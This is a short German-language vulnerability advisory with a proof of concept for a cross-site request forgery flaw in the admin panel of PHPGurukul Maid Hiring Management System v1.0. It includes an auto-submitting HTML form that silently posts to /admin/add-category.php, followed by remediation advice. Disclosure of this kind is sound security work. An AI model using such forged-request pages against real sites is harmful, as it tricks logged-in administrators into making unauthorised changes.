
Proof-of-Concept für eine CSRF-Schwachstelle in PHPGurukul Maid Hiring Management System v1.0, die die nicht autorisierte Erstellung von Kategorien durch manipulierte bösartige Anfragen demonstriert.
Projektname & Repo-URL: Maid Hiring Management System using PHP and MySQL
Schwachstellentyp: Client-Seitige Request-Fälschung
Betroffene Version(en): v1.0
💣Beschreibung der Schwachstelle: Eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) existiert im Admin-Panel des PHPGurukul Hiring Management Systems, die es einem Angreifer ermöglicht, beliebige Einstellungskategorien hinzuzufügen, indem ein authentifizierter Administrator dazu gebracht wird, eine bösartige Website zu besuchen. Dies kann zu Datenverschmutzung und unbefugten Änderungen auf Administratorebene führen.
👩💻Auswirkungen: Unbefugte Kategorieerstellung
🛜Proof-of-Concept (PoC)
2)HTML-Code, um eine POST-Anfrage an den Endpunkt /admin/add-category.php zu senden
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Empfehlung: Implementierung von CSRF-Tokens in Admin-Formularen, Durchsetzung von SameSite-Cookies und Validierung des Anfrageursprungs, um unbefugte Aktionen zu verhindern.